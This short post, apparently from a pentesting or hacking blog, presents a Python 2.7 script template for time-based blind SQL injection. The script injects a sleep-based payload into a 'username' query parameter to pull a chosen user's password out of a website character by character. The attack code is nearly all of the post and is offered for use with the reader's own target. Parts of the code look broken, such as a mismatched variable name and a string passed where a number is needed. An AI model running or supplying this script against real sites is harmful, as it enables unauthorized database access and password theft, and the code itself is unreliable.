Cracking Tools Ethical Hacking and Pentesting MySQL Python Scriptting Software Security
Very Simple Blind Sql Injection Python 2.7.x Script Template for Penetration Testers
Do not forget change parameters with your own…
#Very Simplish Blind Sql Injection Script Template for Python 2.7.X import requests #Sample character set characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ' #Sample target target = 'CHANGE_ME_FIRST ex:www.abc.com' #Sample parameters username = 'CHANGE_ME_FIRST ex:admin' password_length = 'CHANGE_ME_FIRST ex:12' sqlSleepTime = 'CHANGE_ME_FIRST ex:5' requestTimeOut = 'CHANGE_ME_FIRST ex:1' r = requests.get(target) if r.status_code != requests.codes.ok: raise ValueError('Sorry! We cannot connect the site...') else: print 'Connection OK! We can go now...' #FatalityPunction def letBlind (): foundChars = '' for i in range(password_length): for c in characters: try: blindSql = '?username='+username+'" AND IF(password like BINARY "'+foundChars+c+'%",sleep('+sleepTime+'),null)"' r = requests.get(target+blindSql,timeout=requestTimeOut) except requests.exceptions.Timeout: foundChars += c print 'Found chars in password: ' + foundChars break #Start show... letBlind()
POST YOUR COMMENTS
You must be logged in to post a comment.